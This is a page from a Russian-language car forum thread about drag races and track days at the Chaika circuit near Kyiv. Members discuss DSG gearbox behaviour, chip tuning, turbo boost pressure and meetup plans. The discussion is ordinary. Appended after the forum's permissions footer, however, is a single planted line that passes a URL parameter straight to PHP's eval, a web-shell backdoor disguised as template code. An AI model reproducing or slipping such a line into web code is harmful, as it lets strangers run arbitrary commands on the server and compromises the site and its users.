+ Ответить в теме
Страница 41 из 61 ПерваяПервая ... 31 39 40 41 42 43 51 ... ПоследняяПоследняя
Показано с 401 по 410 из 608

Тема: Чайка. Драг, трек дни и прочие мероприятия


  1. #401
    GTI-Racing resident is on a distinguished road Аватар для resident
    Регистрация
    02.03.2010
    Машина
    EVO X SST
    Сообщений
    57
    Цитата Сообщение от Scruj Посмотреть сообщение
    Предыдущий раз они анонсировали буквальна за день :( У меня нет авмортизаторов так что пока это меня не интересует
    Есть такой человек AV! (Андрей) на этом форуме, он не так давно сменил стоковую подвеску на своем Сирокко, можеш спросить у него, я думаю что сток амортизаторы там такиеже.

    Добавлено через 44 минуты
    Тоже хотел бы попробывать гольфик на ралли или на трек-день, но чета мне сцыкотно, да и машинку жалко, она у меня сейчас одна....
    Думаю, что поеду на следующий трек-день...свисните когда будете ехать, а то самому будет страшно....:)

    ДСГ (в спорт режиме + нога в пол) хорошо переключается только до 3 передачи. Самое ужасное это с 3 на 4, особенно на драге когда едеш впереди и при переключении на 4-ую противник приближается к тебе почти на кузов.
    +ручка едет в момент нажатия на педаль газа, а ДСГ еще стоит, даже в ручном режиме. Я на драге, в ланч контроле, отпускаю педаль тормоза когда тухнет второй жельтый и при этом получаю задержку на старте в 0,5 сек :) аналогично всегда присутствует не большая задержка в роллон.

    Я на ГТИ + ЧИП проехал уже порядка 15тыс.км, -проблем нет никаких. 3тыс. км. назад делал плановое ТО, проверяли ошибок нет. Да и на предыдущих авто включая дизельные у меня были сделаны ЧИП, причем на А4 был ноунейм ЧИП, и ниче без проблем. Думаю авто убивает на ЧИП а его владелец :)

    то Gomkv: можем и эту пятницу или суботу. А у тебя сток железо + чип+ручка?

    Добавлено через 56 минут
    Странно APR пишет что в 2.0ТФСИ в стоке 220нм крутящего. А производитель говорит что в стоке 280нм.
    http://www.goapr.com/products/ecu_up...fsi_trans.html
    или это я не правельно смотрю? и после чипа всего 300 крутящего.
    Последний раз редактировалось resident; 27.07.2010 в 15:52. Причина: Добавлено сообщение
    Lemme have a drag of your ashes, what do you say?

  2. #402
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    Валера, если пишешь, что не нужно начинать - то не нужно начинать!
    А если уже начал, то не пиши глупости о давлении! на вашей прошивке, у всех кого я знаю давление в пике выше 1,4, я не думаю что у Саши оно меньше.
    И не будем касаться моего случая, так как за два года, я не получил ответа на вопрос и проблема так и осталась не решенная. А обратился я еще зимой 2007 года, ДО посещения "каких-то" фирм.
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

  3. #403
    to Resident в пятницу не смогу бо утром уеду до вторника, давай сразу после встречи или до
    да чип и ручка
    3d,5d gti, s3

  4. #404
    GTI-Racing ValeraS4 is on a distinguished road Аватар для ValeraS4
    Регистрация
    11.06.2008
    Откуда
    www.vtg.kiev.ua
    Машина
    Audi S4
    Сообщений
    78
    Цитата Сообщение от Pashka Посмотреть сообщение
    Валера, если пишешь, что не нужно начинать - то не нужно начинать!
    А если уже начал, то не пиши глупости о давлении! на вашей прошивке, у всех кого я знаю давление в пике выше 1,4, я не думаю что у Саши оно меньше.
    Я хоть где-то написал что-либо плохое о твоей программе или о том как едет твое авто?Я хоть где-то обсуждаю параметры твоей проги как это делаешь ты? Тебя что кто-то в чем то обвинил что ты полез в дебри наддува?Или тебя кто-то заставлял гоняться? Зачем сейчас искать причины?Тебя же никто не опускает...Прокатились-отлично.Все супер.все довольны.Ты доволен своей прогой,значит она супер.Саша доволен своей-значит она супер.Кто то доволен АПР-значит он супер.Вот что главное.

    Паша, ты хоть понял что я написал про момент и мощность?
    пик момента или его максимум примерно на 3000 обор(если полку не делать)..ты его хоть 2 бара сделай(но не сделаешь) - это пиковое давление и оно где то на 2500 оборотах... а потом оно пошло вниз .. и на высоких оборотах турбина сдувается все равно ....и я думаю что на Гольфе что у тебя давление на 4.5-7 тыс одинаковое будет ..+-...а где при ролоне машина едет на3 тыс. оборотах?
    и чем выше пик,в определенных рамках конечно,тем быстрее сдувается турбина.... более того,большое пиковое давление на нашем бензе очень греет воздух на впуске и как итог - машина на верхах едет хуже...А Саша и остальные каждый день ездят на 95 бензе ...
    Я имею ввиду,что мощность ,НЕ МОМЕНТ, у машины с пиком по бусту в 1.15-1.2 бара будет не меньше чем у авто с пиком 1.4 бара при нормальных настройках конечно.. более того,вполне возможно,что на высоких оборотах такое авто будет ехать лучше по причинам,которые я объяснил выше...
    Чтобы было понятно,приведу пример с Ево. Максимальная мощность у него на нашем 98 при 1.6 -1.65 бара..если повышать давление растет только момент,а мощность начинает падать.... пример грубый но примерно понятно о чем я...

    зы. я гляну специально вцдс давление в Гольфе на высоких оборотах как-нибудь и скажу тебе для интереса...или Саня скажет...
    Последний раз редактировалось ValeraS4; 27.07.2010 в 22:20.

  5. #405
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от Ginger Fish Посмотреть сообщение
    А когда ближайший Трек-день, кто знает?

    ЗЫ Тема как то поменяла направление.
    С трек-днями как-то туманно. Начать с того, что до сих пор даже не обновили результаты за 04.07 и вообще полнейшая тишина. Как-то странно.........

    Да, друзья, пожалуйста, ближе к теме или делайте новые темы по подобным животрепещущим вопросам.

  6. #406
    GTI-Racing resident is on a distinguished road Аватар для resident
    Регистрация
    02.03.2010
    Машина
    EVO X SST
    Сообщений
    57
    Цитата Сообщение от Gomkv Посмотреть сообщение
    to Resident в пятницу не смогу бо утром уеду до вторника, давай сразу после встречи или до
    да чип и ручка
    Я в пятницу тоже не могу, в Четверг в 23:00 поезд на Юга....буду ток в понедельник.
    в четверг нужно все успеть оперативненько :)
    Lemme have a drag of your ashes, what do you say?

  7. #407
    Цитата Сообщение от resident Посмотреть сообщение
    Я в пятницу тоже не могу, в Четверг в 23:00 поезд на Юга....буду ток в понедельник.
    в четверг нужно все успеть оперативненько :)
    а сегодня и в каком районе ты обитаешь
    3d,5d gti, s3

  8. #408
    GTI-Racing resident is on a distinguished road Аватар для resident
    Регистрация
    02.03.2010
    Машина
    EVO X SST
    Сообщений
    57
    Цитата Сообщение от Gomkv Посмотреть сообщение
    а сегодня и в каком районе ты обитаешь
    Извини, только сейчас увидел сообщение. Я обитаю на Отрадном, рядом индустриальный мост.

    Давай перенесем на следующую неделю, у меня моральная травма... на прошлой неделе какойто пид..ас вьехал мне в дверь под маркетом и скрылся, а вчера камень влетел в лобовое и теперь у меня огромная трещина....
    сплошной не фарт бл..ть! достается моему гольфику...
    Lemme have a drag of your ashes, what do you say?

  9. #409
    Вроде как в эту субботу будет Трек-день. Кто то планирует быть?

  10. #410
    GTI-Racing Pashka is on a distinguished road Аватар для Pashka
    Регистрация
    27.02.2008
    Откуда
    Киев
    Машина
    Seat Leon FR 2.0 TFSI
    Сообщений
    391
    я планирую к 12
    Seat Leon FR 2.0 TFSI (green)/Chip ATG/Cold Air Intake/DownPipe 3"/Wiechers sport front & rear/Zimmermann Sport/

+ Ответить в теме
Страница 41 из 61 ПерваяПервая ... 31 39 40 41 42 43 51 ... ПоследняяПоследняя

Похожие темы

  1. Чайка Драг
    от Gomkv в разделе Встречи и мероприятия
    Ответов: 31
    Последнее сообщение: 07.01.2024, 20:21
  2. Мероприятия в марте
    от IvanGTIV в разделе Встречи и мероприятия
    Ответов: 21
    Последнее сообщение: 05.01.2024, 08:13
  3. Ответов: 2
    Последнее сообщение: 21.02.2015, 11:36
  4. Европейские мероприятия VW
    от Radge39 в разделе Курилка
    Ответов: 3
    Последнее сообщение: 25.05.2010, 23:28
  5. Чайка
    от Gomkv в разделе Украина
    Ответов: 29
    Последнее сообщение: 28.04.2009, 17:01

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}